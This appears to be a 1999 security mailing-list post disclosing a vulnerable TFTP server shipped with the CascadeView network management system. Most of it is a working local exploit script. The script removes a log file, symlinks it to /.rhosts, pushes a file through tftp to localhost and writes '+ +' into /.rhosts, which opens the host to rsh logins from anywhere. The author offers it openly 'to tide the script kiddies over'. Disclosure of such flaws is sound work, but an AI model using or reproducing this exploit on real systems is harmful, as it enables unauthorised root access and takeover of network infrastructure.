From: Loneguard (loneguardat_private)
Date: Fri Dec 31 1999 - 08:48:25 PST

  • Next message: Loneguard: ""

    CascadeView is an network management system that ships with an
    exploitable TFTP server. Incase anyone misses the significance
    of this, you control the NMS you control the network :) Here's
    a local exploit to tied the script kiddies over...
    # - Loneguard 07/03/99
    # Buggy tftp server shipped with CascadeView B-STDX 8000/9000
    rm /tmp/tftpd_xfer_status.log
    ln -s /.rhosts /tmp/tftpd_xfer_status.log
    echo KungFu > crazymonkey
    ( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1
    echo "+ +" > /.rhosts

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